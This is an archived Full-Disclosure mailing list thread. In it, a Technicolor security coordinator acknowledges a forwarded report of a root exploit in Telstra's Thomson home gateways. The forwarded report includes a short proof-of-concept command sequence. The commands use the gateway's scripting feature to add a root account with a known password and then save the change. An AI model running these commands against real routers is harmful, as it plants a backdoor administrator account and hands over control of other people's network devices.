lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 2 Aug 2011 10:33:00 +0200
From: Auffret Patrice <Patrice.Auffret@...hnicolor.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Cc: *Security Reporting <security@...mson.net>
Subject: Re: Telstra thompson gateway - root exploit (0day)

Dear Mr secn3t,

Thank you for porting this security issue to our attention.
We will analyze your report about the aforementioned issue.

For your information, Technicolor products security issues may be reported to the following address: security_at_technicolor.com.
So for you future potential findings, do not hesitate to directly contact us.

Technicolor is making its best to avoid security issues in its products, but we never be 100% sure we missed no one.

Best regards, Technicolor Security Team.

-- 
Patrice Auffret | Security Assessment Coordinator
Security and Content Protection Labs | Technology & Engineering
+33 (0)2 99 27 3246 | +33 (0)6 81 98 8007

----- Forwarded message from xD 0x41 <secn3t@...il.com> -----

Date: Fri, 29 Jul 2011 06:59:34 +1000
From: xD 0x41 <secn3t@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [Full-disclosure] Telstra thompson gateway - root exploit (0day)

Telstra thompson gateway - root exploit

Telstra is an ISP here in Australia, it is also the same isp wich owns the
NBN

Author: Talon ( #haxnet member)


PoC script:

script add name addroot command user add name talon password talon role root
descr ROOT
script run name addroot pars
saveall


This would add a root user as talon:talon ,with complete control over the
gateway and anything running from it.
On behalf of talon, before it gets raped by some idling non @.
cheers

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


----- End forwarded message -----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ